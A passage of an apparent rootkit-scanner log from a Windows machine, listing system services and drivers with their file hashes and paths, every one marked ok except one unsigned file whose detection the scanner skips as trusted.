16:02:01.0056 0x4af4 [ 808E98FF49B155C522E6400953177B08, F873F5BFF0984C5165DF67E92874D3F6EB8D86F9B5AD17013A0091CA33A1A3D5 ] MSiSCSI C:\Windows\system32\iscsiexe.dll
16:02:01.0072 0x4af4 MSiSCSI - ok
16:02:01.0088 0x4af4 msiserver - ok
16:02:01.0103 0x4af4 [ 49CCF2C4FEA34FFAD8B1B59D49439366, E5752EA57C7BDAD5F53E3BC441A415E909AC602CAE56234684FB8789A20396C7 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys
16:02:01.0119 0x4af4 MSKSSRV - ok
16:02:01.0150 0x4af4 [ F0D5494D8B177C37E16966262F5D0F68, DD63427DFFD9DD2BEC8336F6AD1BEFE347012331631DC5FEC65E83B1EACDBC67 ] MsMpSvc c:\Program Files\Microsoft Security Client\MsMpEng.exe
16:02:01.0150 0x4af4 MsMpSvc - ok
16:02:01.0150 0x4af4 [ BDD71ACE35A232104DDD349EE70E1AB3, 27464A66868513BE6A01B75D7FC5B0D6B71842E4E20CE3F76B15C071A0618BBB ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys
16:02:01.0181 0x4af4 MSPCLOCK - ok
16:02:01.0181 0x4af4 [ 4ED981241DB27C3383D72092B618A1D0, E12F121E641249DB3491141851B59E1496F4413EDF58E863388F1C229838DFCC ] MSPQM C:\Windows\system32\drivers\MSPQM.sys
16:02:01.0212 0x4af4 MSPQM - ok
16:02:01.0228 0x4af4 [ 759A9EEB0FA9ED79DA1FB7D4EF78866D, 64E3BC613EC4872B1B344CBF71EE15BE195592E3244C1EE099C6F8B95A40F133 ] MsRPC C:\Windows\system32\drivers\MsRPC.sys
16:02:01.0244 0x4af4 MsRPC - ok
16:02:01.0259 0x4af4 [ 0EED230E37515A0EAEE3C2E1BC97B288, B1D8F8A75006B6E99214CA36D27A8594EF8D952F315BEB201E9BAC9DE3E64D42 ] mssmbios C:\Windows\system32\drivers\mssmbios.sys
16:02:01.0259 0x4af4 mssmbios - ok
16:02:01.0290 0x4af4 [ 2E66F9ECB30B4221A318C92AC2250779, DF175E1AB6962303E57F26DAE5C5C1E40B8640333F3E352A64F6A5F1301586CD ] MSTEE C:\Windows\system32\drivers\MSTEE.sys
16:02:01.0306 0x4af4 MSTEE - ok
16:02:01.0306 0x4af4 [ 7EA404308934E675BFFDE8EDF0757BCD, 306CD02D89CFCFE576242360ED5F9EEEDCAFC43CD43B7D2977AE960F9AEC3232 ] MTConfig C:\Windows\system32\drivers\MTConfig.sys
16:02:01.0322 0x4af4 MTConfig - ok
16:02:01.0337 0x4af4 [ F9A18612FD3526FE473C1BDA678D61C8, 32F7975B5BAA447917F832D9E3499B4B6D3E90D73F478375D0B70B36C524693A ] Mup C:\Windows\system32\Drivers\mup.sys
16:02:01.0337 0x4af4 Mup - ok
16:02:01.0384 0x4af4 [ 582AC6D9873E31DFA28A4547270862DD, BD540499F74E8F59A020D935D18E36A3A97C1A6EC59C8208436469A31B16B260 ] napagent C:\Windows\system32\qagentRT.dll
16:02:01.0415 0x4af4 napagent - ok
16:02:01.0431 0x4af4 [ 1EA3749C4114DB3E3161156FFFFA6B33, 54C2E77BCE1037711A11313AC25B8706109098C10A31AA03AEB7A185E97800D7 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys
16:02:01.0446 0x4af4 NativeWifiP - ok
16:02:01.0478 0x4af4 [ 760E38053BF56E501D562B70AD796B88, F856E81A975D44F8684A6F2466549CEEDFAEB3950191698555A93A1206E0A42D ] NDIS C:\Windows\system32\drivers\ndis.sys
16:02:01.0509 0x4af4 NDIS - ok
16:02:01.0524 0x4af4 [ 9F9A1F53AAD7DA4D6FEF5BB73AB811AC, D7E5446E83909AE25506BB98FBDD878A529C87963E3C1125C4ABAB25823572BC ] NdisCap C:\Windows\system32\DRIVERS\ndiscap.sys
16:02:01.0556 0x4af4 NdisCap - ok
16:02:01.0556 0x4af4 [ 30639C932D9FEF22B31268FE25A1B6E5, 32873D95339600F6EEFA51847D12C563FF01F320DC59055B242FA2887C99F9D6 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys
16:02:01.0571 0x4af4 NdisTapi - ok
16:02:01.0587 0x4af4 [ 136185F9FB2CC61E573E676AA5402356, BA3AD0A33416DA913B4242C6BE8C3E5812AD2B20BA6C11DD3094F2E8EB56E683 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys
16:02:01.0618 0x4af4 Ndisuio - ok
16:02:01.0618 0x4af4 [ 53F7305169863F0A2BDDC49E116C2E11, 881E9346D3C02405B7850ADC37E720990712EC9C666A0CE96E252A487FD2CE77 ] NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys
16:02:01.0649 0x4af4 NdisWan - ok
16:02:01.0665 0x4af4 [ 015C0D8E0E0421B4CFD48CFFE2825879, 4242E2D42CCFC859B2C0275C5331798BC0BDA68E51CF4650B6E64B1332071023 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys
16:02:01.0680 0x4af4 NDProxy - ok
16:02:01.0696 0x4af4 [ 86743D9F5D2B1048062B14B1D84501C4, DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062 ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys
16:02:01.0712 0x4af4 NetBIOS - ok
16:02:01.0727 0x4af4 [ 09594D1089C523423B32A4229263F068, 7426A9B8BA27D3225928DDEFBD399650ABB90798212F56B7D12158AC22CCCE37 ] NetBT C:\Windows\system32\DRIVERS\netbt.sys
16:02:01.0758 0x4af4 NetBT - ok
16:02:01.0774 0x4af4 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] Netlogon C:\Windows\system32\lsass.exe
16:02:01.0774 0x4af4 Netlogon - ok
16:02:01.0805 0x4af4 [ 847D3AE376C0817161A14A82C8922A9E, 37AE692B3481323134125EF58F2C3CBC20177371AF2F5874F53DD32A827CB936 ] Netman C:\Windows\System32\netman.dll
16:02:01.0836 0x4af4 Netman - ok
16:02:01.0883 0x4af4 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
16:02:01.0914 0x4af4 NetMsmqActivator - ok
16:02:01.0914 0x4af4 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetPipeActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
16:02:01.0930 0x4af4 NetPipeActivator - ok
16:02:01.0946 0x4af4 [ 5F28111C648F1E24F7DBC87CDEB091B8, 2E8645285921EDB98BB2173E11E57459C888D52E80D85791D169C869DE8813B9 ] netprofm C:\Windows\System32\netprofm.dll
16:02:01.0992 0x4af4 netprofm - ok
16:02:01.0992 0x4af4 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
16:02:02.0008 0x4af4 NetTcpActivator - ok
16:02:02.0008 0x4af4 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
16:02:02.0024 0x4af4 NetTcpPortSharing - ok
16:02:02.0039 0x4af4 [ 77889813BE4D166CDAB78DDBA990DA92, 2EF531AE502B943632EEC66A309A8BFCDD36120A5E1473F4AAF3C2393AD0E6A3 ] nfrd960 C:\Windows\system32\drivers\nfrd960.sys
16:02:02.0039 0x4af4 nfrd960 - ok
16:02:02.0070 0x4af4 [ F9EEFFC65C68A45001D1349E652B8B6F, E5F223129416083A12A85D48C65B2C8D1BF1124110399938E144308C89F9241D ] NisDrv C:\Windows\system32\DRIVERS\NisDrvWFP.sys
16:02:02.0086 0x4af4 NisDrv - ok
16:02:02.0102 0x4af4 [ 9690F420A99364C1E5C439914B0DE25C, 6C6E0B27C4255001FE5F1EAD911DE1A8BF922C405B0C8031A6BD253CEB1D02A6 ] NisSrv c:\Program Files\Microsoft Security Client\NisSrv.exe
16:02:02.0117 0x4af4 NisSrv - ok
16:02:02.0133 0x4af4 [ 8AD77806D336673F270DB31645267293, E23F324913554A23CD043DD27D4305AF62F48C0561A0FC7B7811E55B74B1BE79 ] NlaSvc C:\Windows\System32\nlasvc.dll
16:02:02.0148 0x4af4 NlaSvc - ok
16:02:02.0211 0x4af4 [ B1EF4686961986DFFB7FE8F18E6FCB5B, 562F144DAA8C2D6E4D55C7ABEF1DB52FC67F1A09E03CD700E27DFC3A4920E271 ] nlsX86cc C:\Windows\SysWOW64\nlssrv32.exe
16:02:02.0226 0x4af4 nlsX86cc - detected UnsignedFile.Multi.Generic ( 1 )
16:02:02.0226 0x4af4 Detect skipped due to KSN trusted
16:02:02.0226 0x4af4 nlsX86cc - ok
16:02:02.0242 0x4af4 [ 1E4C4AB5C9B8DD13179BBDC75A2A01F7, D8957EF7060A69DBB3CD6B2C45B1E4143592AB8D018471E17AC04668157DC67F ] Npfs C:\Windows\system32\drivers\Npfs.sys
16:02:02.0273 0x4af4 Npfs - ok
16:02:02.0304 0x4af4 [ D54BFDF3E0C953F823B3D0BFE4732528, 497A1DCC5646EC22119273216DF10D5442D16F83E4363770F507518CF6EAA53A ] nsi C:\Windows\system32\nsisvc.dll
16:02:02.0320 0x4af4 nsi - ok
16:02:02.0351 0x4af4 [ E7F5AE18AF4168178A642A9247C63001, 133023B7E4BA8049C4CAED3282BDD25571D1CC25FAC3B820C7F981D292689D76 ] nsiproxy C:\Windows\system32\drivers\nsiproxy.sys
16:02:02.0367 0x4af4 nsiproxy - ok
16:02:02.0429 0x4af4 [ 1A29A59A4C5BA6F8C85062A613B7E2B2, CC137F499A12C724D4166C2D85E9F447413419A0683DAC6F1A802B7F210C77F1 ] Ntfs C:\Windows\system32\drivers\Ntfs.sys
16:02:02.0460 0x4af4 Ntfs - ok
16:02:02.0492 0x4af4 [ 9899284589F75FA8724FF3D16AED75C1, 181188599FD5D4DE33B97010D9E0CAEABAB9A3EF50712FE7F9AA0735CD0666D6 ] Null C:\Windows\system32\drivers\Null.sys
16:02:02.0507 0x4af4 Null - ok
16:02:02.0866 0x4af4 [ C013E857695D231E9E02088E4CD0982B, 33F854B674DDC6FA0CAB873B5567039F68EE7BFAECC08CFD971A1695F26CFF78 ] nvlddmkm C:\Windows\system32\DRIVERS\nvlddmkm.sys
16:02:03.0100 0x4af4 nvlddmkm - ok
16:02:03.0162 0x4af4 [ 30E612C064B64212007B34EAAFF1A5F8, B56888FA956AC11AFE6BD7452D517D00594DDB0A3674386F150EB2A19A6753FA ] nvpciflt C:\Windows\system32\DRIVERS\nvpciflt.sys
16:02:03.0178 0x4af4 nvpciflt - ok
16:02:03.0194 0x4af4 [ 0A92CB65770442ED0DC44834632F66AD, 581327F07A68DBD5CC749214BE5F1211FC2CE41C7A4F0656B680AFB51A35ACE7 ] nvraid C:\Windows\system32\drivers\nvraid.sys
16:02:03.0209 0x4af4 nvraid - ok
16:02:03.0240 0x4af4 [ DAB0E87525C10052BF65F06152F37E4A, AD9BFF0D5FD3FFB95C758B478E1F6A9FE45E7B37AEC71EB5070D292FEAAEDF37 ] nvstor C:\Windows\system32\drivers\nvstor.sys
16:02:03.0256 0x4af4 nvstor - ok
16:02:03.0287 0x4af4 [ 39F24315F99CDB2C9997140F31D44D08, 0B8DC7EBF21B2E43024E8C6838817E87975D24E46FD7BCD15E9AFE3DBEDB37BF ] nvsvc C:\Windows\system32\nvvsvc.exe
16:02:03.0303 0x4af4 nvsvc - ok
16:02:03.0428 0x4af4 [ F3537A1DBFFDB81B169C482B7030C6CA, DEFB017F73F13EC307D0397D7B4979E0D27F086C97F53046AD367780D8CF1116 ] nvUpdatusService C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
16:02:03.0474 0x4af4 nvUpdatusService - ok
16:02:03.0490 0x4af4 [ 270D7CD42D6E3979F6DD0146650F0E05, 752489E54C9004EDCBE1F1F208FFD864DA5C83E59A2DDE6B3E0D63ECA996F76F ] nv_agp C:\Windows\system32\drivers\nv_agp.sys
16:02:03.0490 0x4af4 nv_agp - ok
16:02:03.0506 0x4af4 [ 3589478E4B22CE21B41FA1BFC0B8B8A0, AD2469FC753FE552CB809FF405A9AB23E7561292FE89117E3B3B62057EFF0203 ] ohci1394 C:\Windows\system32\drivers\ohci1394.sys
16:02:03.0506 0x4af4 ohci1394 - ok
16:02:03.0568 0x4af4 [ 9D10F99A6712E28F8ACD5641E3A7EA6B, 70964A0ED9011EA94044E15FA77EDD9CF535CC79ED8E03A3721FF007E69595CC ] ose C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
16:02:03.0584 0x4af4 ose - ok
16:02:03.0802 0x4af4 [ 61BFFB5F57AD12F83AB64B7181829B34, 1DD0DD35E4158F95765EE6639F217DF03A0A19E624E020DBA609268C08A13846 ] osppsvc C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
16:02:03.0880 0x4af4 osppsvc - ok
16:02:03.0927 0x4af4 [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] p2pimsvc C:\Windows\system32\pnrpsvc.dll
16:02:03.0942 0x4af4 p2pimsvc - ok
16:02:03.0958 0x4af4 [ 927463ECB02179F88E4B9A17568C63C3, FEFD3447692C277D59EEC7BF218552C8BB6B8C98C26E973675549628408B94CE ] p2psvc C:\Windows\system32\p2psvc.dll
16:02:03.0974 0x4af4 p2psvc - ok
16:02:03.0989 0x4af4 [ 0086431C29C35BE1DBC43F52CC273887, 0D116D49EF9ABB57DA005764F25E692622210627FC2048F06A989B12FA8D0A80 ] Parport C:\Windows\system32\drivers\parport.sys
16:02:04.0005 0x4af4 Parport - ok
16:02:04.0036 0x4af4 [ E9766131EEADE40A27DC27D2D68FBA9C, 63C295EC96DBD25F1A8B908295CCB86B54F2A77A02AAA11E5D9160C2C1A492B6 ] partmgr C:\Windows\system32\drivers\partmgr.sys
16:02:04.0067 0x4af4 partmgr - ok
16:02:04.0098 0x4af4 [ 256390425414F90FCBC12F525A84EB11, A4992020BF6A239AD8A77125426E2C39980C9ABC971C4DBCB24B358F946AD7F9 ] PcaSvc C:\Windows\System32\pcasvc.dll
16:02:04.0098 0x4af4 PcaSvc - ok
16:02:04.0114 0x4af4 [ B9F2F6AACE16DC38EAA7AFD537854DF4, C1B8B495C16E28189BBE374B491417DC77502FE46286EA89F8C9D45B82F672A0 ] pci C:\Windows\system32\drivers\pci.sys
16:02:04.0130 0x4af4 pci - ok
16:02:04.0145 0x4af4 [ B5B8B5EF2E5CB34DF8DCF8831E3534FA, F2A7CC645B96946CC65BF60E14E70DC09C848D27C7943CE5DEA0C01A6B863480 ] pciide C:\Windows\system32\drivers\pciide.sys
16:02:04.0161 0x4af4 pciide - ok
16:02:04.0176 0x4af4 [ B2E81D4E87CE48589F98CB8C05B01F2F, 6763BEE7270A4873B3E131BFB92313E2750FCBD0AD73C23D1C4F98F7DF73DE14 ] pcmcia C:\Windows\system32\drivers\pcmcia.sys
16:02:04.0192 0x4af4 pcmcia - ok
16:02:04.0208 0x4af4 [ D6B9C2E1A11A3A4B26A182FFEF18F603, BBA5FE08B1DDD6243118E11358FD61B10E850F090F061711C3CB207CE5FBBD36 ] pcw C:\Windows\system32\drivers\pcw.sys
16:02:04.0208 0x4af4 pcw - ok
16:02:04.0239 0x4af4 [ 946010CDFA91469351B22E2620CEBCD8, F099C92706D42ADC289B72724F7932E5D4F62A427AEC967DDB0A1D728AE59A63 ] PEAUTH C:\Windows\system32\drivers\peauth.sys
16:02:04.0270 0x4af4 PEAUTH - ok
16:02:04.0286 0x4af4 [ E495E408C93141E8FC72DC0C6046DDFA, 489B957DADA0DC128A09468F1AD082DCC657E86053208EA06A12937BE86FB919 ] PerfHost C:\Windows\SysWow64\perfhost.exe
16:02:04.0301 0x4af4 PerfHost - ok
16:02:04.0348 0x4af4 [ C7CF6A6E137463219E1259E3F0F0DD6C, 08D7244F52AA17DD669AA6F77C291DAC88E7B2D1887DE422509C1F83EC85F3DD ] pla C:\Windows\system32\pla.dll
16:02:04.0379 0x4af4 pla - ok
16:02:04.0426 0x4af4 [ 25FBDEF06C4D92815B353F6E792C8129, 57D9764AE6BCE33B242C399CDFC10DD405975BD6411CA8C75FBCD06EEB8442A9 ] PlugPlay C:\Windows\system32\umpnpmgr.dll
16:02:04.0457 0x4af4 PlugPlay - ok
16:02:04.0473 0x4af4 [ 7195581CEC9BB7D12ABE54036ACC2E38, 9C4E5D6EA984148F2663DC529083408B2248DFF6DAAC85D9195F80A722782315 ] PNRPAutoReg C:\Windows\system32\pnrpauto.dll
16:02:04.0488 0x4af4 PNRPAutoReg - ok
16:02:04.0504 0x4af4 [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] PNRPsvc C:\Windows\system32\pnrpsvc.dll
16:02:04.0520 0x4af4 PNRPsvc - ok
16:02:04.0566 0x4af4 [ 4F15D75ADF6156BF56ECED6D4A55C389, 2ADA3EA69A5D7EC2A4D2DD89178DB94EAFDDF95F07B0070D654D9F7A5C12A044 ] PolicyAgent C:\Windows\System32\ipsecsvc.dll
16:02:04.0598 0x4af4 PolicyAgent - ok
16:02:04.0613 0x4af4 [ A2CCA4FB273E6050F17A0A416CFF2FCD, C42BA18DF0C8E3F7358669A784E51E4DC7A4112096345EA699EDC95F561E0255 ] Power C:\Windows\system32\umpo.dll
16:02:04.0629 0x4af4 Power - ok
16:02:04.0660 0x4af4 [ F92A2C41117A11A00BE01CA01A7FCDE9, 38ADC6052696D110CA5F393BC586791920663F5DA66934C2A824DDA9CD89C763 ] PptpMiniport C:\Windows\system32\DRIVERS\raspptp.sys
16:02:04.0676 0x4af4 PptpMiniport - ok
16:02:04.0676 0x4af4 [ 0D922E23C041EFB1C3FAC2A6F943C9BF, 855418A6A58DCAFB181A1A68613B3E203AFB0A9B3D9D26D0C521F9F613B4EAD5 ] Processor C:\Windows\system32\drivers\processr.sys
16:02:04.0691 0x4af4 Processor - ok
16:02:04.0722 0x4af4 [ 53E83F1F6CF9D62F32801CF66D8352A8, 1225FED810BE8E0729EEAE5B340035CCBB9BACD3EF247834400F9B72D05ACE48 ] ProfSvc C:\Windows\system32\profsvc.dll
16:02:04.0738 0x4af4 ProfSvc - ok
16:02:04.0754 0x4af4 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] ProtectedStorage C:\Windows\system32\lsass.exe
16:02:04.0754 0x4af4 ProtectedStorage - ok
16:02:04.0769 0x4af4 [ 0557CF5A2556BD58E26384169D72438D, F6F83A616B1F1C6C0DF6D2EC2513E6C23FD4FAA6D36518B8676C619AB74957B4 ] Psched C:\Windows\system32\DRIVERS\pacer.sys
16:02:04.0800 0x4af4 Psched - ok
16:02:04.0847 0x4af4 [ A53A15A11EBFD21077463EE2C7AFEEF0, 6002B012A75045DEA62640A864A8721EADE2F8B65BEB5F5BA76D8CD819774489 ] ql2300 C:\Windows\system32\drivers\ql2300.sys
16:02:04.0878 0x4af4 ql2300 - ok
16:02:04.0910 0x4af4 [ 4F6D12B51DE1AAEFF7DC58C4D75423C8, FB6ABAB741CED66A79E31A45111649F2FA3E26CEE77209B5296F789F6F7D08DE ] ql40xx C:\Windows\system32\drivers\ql40xx.sys
16:02:04.0925 0x4af4 ql40xx - ok
16:02:04.0941 0x4af4 [ 906191634E99AEA92C4816150BDA3732, A0305436384104C3B559F9C73902DA19B96B518413379E397C5CDAB0B2B9418F ] QWAVE C:\Windows\system32\qwave.dll
16:02:04.0956 0x4af4 QWAVE - ok
16:02:04.0972 0x4af4 [ 76707BB36430888D9CE9D705398ADB6C, 35C1D1D05F98AC29A33D3781F497A0B40A3CB9CDF25FE1F28F574E40DDF70535 ] QWAVEdrv C:\Windows\system32\drivers\qwavedrv.sys
16:02:04.0988 0x4af4 QWAVEdrv - ok
16:02:05.0003 0x4af4 [ 5A0DA8AD5762FA2D91678A8A01311704, 8A64EB5DBAB7048A9E42A21CEB62CCD5B007A80C199892D7F8C69B48E8A255EF ] RasAcd C:\Windows\system32\DRIVERS\rasacd.sys
16:02:05.0019 0x4af4 RasAcd - ok
16:02:05.0050 0x4af4 [ 7ECFF9B22276B73F43A99A15A6094E90, 62C70DA127F48F796F8897BBFA23AB6EB080CC923F0F091DFA384A93F5C90CA1 ] RasAgileVpn C:\Windows\system32\DRIVERS\AgileVpn.sys
16:02:05.0066 0x4af4 RasAgileVpn - ok
16:02:05.0081 0x4af4 [ 8F26510C5383B8DBE976DE1CD00FC8C7, 60E618C010E8A723960636415573FA17EA0BBEF79647196B3BC0B8DEE680E090 ] RasAuto C:\Windows\System32\rasauto.dll
16:02:05.0097 0x4af4 RasAuto - ok
16:02:05.0128 0x4af4 [ 471815800AE33E6F1C32FB1B97C490CA, 27307265F743DE3A3A3EC1B2C472A3D85FDD0AEC458E0B1177593141EE072698 ] Rasl2tp C:\Windows\system32\DRIVERS\rasl2tp.sys
16:02:05.0144 0x4af4 Rasl2tp - ok
16:02:05.0175 0x4af4 [ EE867A0870FC9E4972BA9EAAD35651E2, 1B848D81705081FD2E18AC762DA7F51455657DAF860BF363DC15925A148BCADA ] RasMan C:\Windows\System32\rasmans.dll
16:02:05.0206 0x4af4 RasMan - ok
16:02:05.0222 0x4af4 [ 855C9B1CD4756C5E9A2AA58A15F58C25, A514F8A9C304D54BDA8DC60F5A64259B057EC83A1CAAF6D2B58CFD55E9561F72 ] RasPppoe C:\Windows\system32\DRIVERS\raspppoe.sys
16:02:05.0253 0x4af4 RasPppoe - ok
16:02:05.0253 0x4af4 [ E8B1E447B008D07FF47D016C2B0EEECB, FEC789F82B912F3E14E49524D40FEAA4373B221156F14045E645D7C37859258C ] RasSstp C:\Windows\system32\DRIVERS\rassstp.sys
16:02:05.0284 0x4af4 RasSstp - ok
16:02:05.0300 0x4af4 [ 77F665941019A1594D887A74F301FA2F, 1FDC6F6853400190C086042933F157814D915C54F26793CAD36CD2607D8810DA ] rdbss C:\Windows\system32\DRIVERS\rdbss.sys
16:02:05.0331 0x4af4 rdbss - ok
16:02:05.0346 0x4af4 [ 302DA2A0539F2CF54D7C6CC30C1F2D8D, 1DF3501BBFFB56C3ECC39DBCC4287D3302216C2208CE22428B8C4967E5DE9D17 ] rdpbus C:\Windows\system32\drivers\rdpbus.sys
16:02:05.0346 0x4af4 rdpbus - ok
16:02:05.0362 0x4af4 [ CEA6CC257FC9B7715F1C2B4849286D24, A78144D18352EA802C39D9D42921CF97A3E0211766B2169B6755C6FC2D77A804 ] RDPCDD C:\Windows\system32\DRIVERS\RDPCDD.sys
16:02:05.0378 0x4af4 RDPCDD - ok
16:02:05.0393 0x4af4 [ BB5971A4F00659529A5C44831AF22365, 9AAA5C0D448E821FD85589505D99DF7749715A046BBD211F139E4E652ADDE41F ] RDPENCDD C:\Windows\system32\drivers\rdpencdd.sys
16:02:05.0409 0x4af4 RDPENCDD - ok
16:02:05.0409 0x4af4 [ 216F3FA57533D98E1F74DED70113177A, 60C126A1409D1E9C39F1C9E95F70115BF4AF07780AB499F6E10A612540F173F4 ] RDPREFMP C:\Windows\system32\drivers\rdprefmp.sys
16:02:05.0440 0x4af4 RDPREFMP - ok
16:02:05.0456 0x4af4 [ FE571E088C2D83619D2D48D4E961BF41, 88C5A2FCB1D0E528657842E39963471A6E42FCA3FCDF37955AEC8258AB4C48EA ] RDPWD C:\Windows\system32\drivers\RDPWD.sys
16:02:05.0471 0x4af4 RDPWD - ok
16:02:05.0487 0x4af4 [ A115F49BEA840A5F049BC6310F35F776, 3A4D681959A493ECC24C4B0925F5F4FD336F93C317198C210907E466D3F704CA ] rdyboost C:\Windows\system32\drivers\rdyboost.sys
16:02:05.0487 0x4af4 rdyboost - ok
16:02:05.0518 0x4af4 [ 254FB7A22D74E5511C73A3F6D802F192, 3D0FB5840364200DE394F8CC28DA0E334C2B5FA8FF28A41656EE72287F3D3836 ] RemoteAccess C:\Windows\System32\mprdim.dll
16:02:05.0534 0x4af4 RemoteAccess - ok
16:02:05.0565 0x4af4 [ E4D94F24081440B5FC5AA556C7C62702, 147CAA03568DC480F9506E30B84891AB7E433B5EBC05F34FF10F72B00E1C6B22 ] RemoteRegistry C:\Windows\system32\regsvc.dll
16:02:05.0596 0x4af4 RemoteRegistry - ok
16:02:05.0612 0x4af4 [ 3DD798846E2C28102B922C56E71B7932, 30B111615D74CB2213997A5C08DD9C8613ADE441D9423CC1C49A753D13CE524D ] RFCOMM C:\Windows\system32\DRIVERS\rfcomm.sys
16:02:05.0627 0x4af4 RFCOMM - ok
16:02:05.0627 0x4af4 [ E4DC58CF7B3EA515AE917FF0D402A7BB, 665B5CD9FE905B0EE3F59A7B1A94760F5393EBEE729877D8584349754C2867E8 ] RpcEptMapper C:\Windows\System32\RpcEpMap.dll
16:02:05.0658 0x4af4 RpcEptMapper - ok
16:02:05.0674 0x4af4 [ D5BA242D4CF8E384DB90E6A8ED850B8C, CB4CB2608B5E31B55FB1A2CF4051E6D08A0C2A5FB231B2116F95938D7577334E ] RpcLocator C:\Windows\system32\locator.exe
16:02:05.0690 0x4af4 RpcLocator - ok
16:02:05.0736 0x4af4 [ 5C627D1B1138676C0A7AB2C2C190D123, C5003F2C912C5CA990E634818D3B4FD72F871900AF2948BD6C4D6400B354B401 ] RpcSs C:\Windows\system32\rpcss.dll
16:02:05.0768 0x4af4 RpcSs - ok
16:02:05.0783 0x4af4 [ DDC86E4F8E7456261E637E3552E804FF, D250C69CCC75F2D88E7E624FCC51300E75637333317D53908CCA7E0F117173DD ] rspndr C:\Windows\system32\DRIVERS\rspndr.sys
16:02:05.0814 0x4af4 rspndr - ok
16:02:05.0830 0x4af4 [ BB1C3DF1D6CC0972E9C7268A19E62D2E, C362BA0CB2B8CC0CBBD44A76DBC8FD2B44546B027CD794DC64E24D50BEA4FAC6 ] RSUSBSTOR C:\Windows\System32\Drivers\RtsUStor.sys
16:02:05.0846 0x4af4 RSUSBSTOR - ok
16:02:05.0861 0x4af4 [ 8181B5E7BFC040E0B26349C73E719335, EBB244A7E8E2CDC51041B2C2A78DCB77324F9E3746942C84902FCD928ADED897 ] RTL8167 C:\Windows\system32\DRIVERS\Rt64win7.sys
16:02:05.0877 0x4af4 RTL8167 - ok
16:02:05.0892 0x4af4 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] SamSs C:\Windows\system32\lsass.exe
16:02:05.0908 0x4af4 SamSs - ok
16:02:05.0924 0x4af4 [ AC03AF3329579FFFB455AA2DAABBE22B, 7AD3B62ADFEC166F9E256F9FF8BAA0568B2ED7308142BF8F5269E6EAA5E0A656 ] sbp2port C:\Windows\system32\drivers\sbp2port.sys
16:02:05.0924 0x4af4 sbp2port - ok
16:02:05.0955 0x4af4 [ 9B7395789E3791A3B6D000FE6F8B131E, E5F067F3F212BF5481668BE1779CBEF053F511F8967589BE2E865ACB9A620024 ] SCardSvr C:\Windows\System32\SCardSvr.dll
16:02:05.0970 0x4af4 SCardSvr - ok
16:02:05.0986 0x4af4 [ 253F38D0D7074C02FF8DEB9836C97D2B, CB5CAFCB8628BB22877F74ACF1DED0BBAED8F4573A74DA7FE94BBBA584889116 ] scfilter C:\Windows\system32\DRIVERS\scfilter.sys
16:02:06.0002 0x4af4 scfilter - ok
16:02:06.0048 0x4af4 [ 262F6592C3299C005FD6BEC90FC4463A, 54095E37F0B6CC677A3E9BDD40F4647C713273D197DB341063AA7F342A60C4A7 ] Schedule C:\Windows\system32\schedsvc.dll
16:02:06.0080 0x4af4 Schedule - ok
16:02:06.0111 0x4af4 [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] SCPolicySvc C:\Windows\System32\certprop.dll
16:02:06.0126 0x4af4 SCPolicySvc - ok
16:02:06.0158 0x4af4 [ 6EA4234DC55346E0709560FE7C2C1972, 64011E044C16E2F92689E5F7E4666A075E27BBFA61F3264E5D51CE1656C1D5B8 ] SDRSVC C:\Windows\System32\SDRSVC.dll
16:02:06.0158 0x4af4 SDRSVC - ok
16:02:06.0189 0x4af4 [ 3EA8A16169C26AFBEB544E0E48421186, 34BBB0459C96B3DE94CCB0D73461562935C583D7BF93828DA4E20A6BC9B7301D ] secdrv C:\Windows\system32\drivers\secdrv.sys
16:02:06.0220 0x4af4 secdrv - ok
16:02:06.0220 0x4af4 [ BC617A4E1B4FA8DF523A061739A0BD87, 10C4057F6B321EB5237FF619747B74F5401BC17D15A8C7060829E8204A2297F9 ] seclogon C:\Windows\system32\seclogon.dll
16:02:06.0251 0x4af4 seclogon - ok
16:02:06.0267 0x4af4 [ C32AB8FA018EF34C0F113BD501436D21, E0EB8E80B51E45CA7EB061E705DA0BC07878759418A8519AE6E12326FE79E7C7 ] SENS C:\Windows\system32\sens.dll
16:02:06.0282 0x4af4 SENS - ok
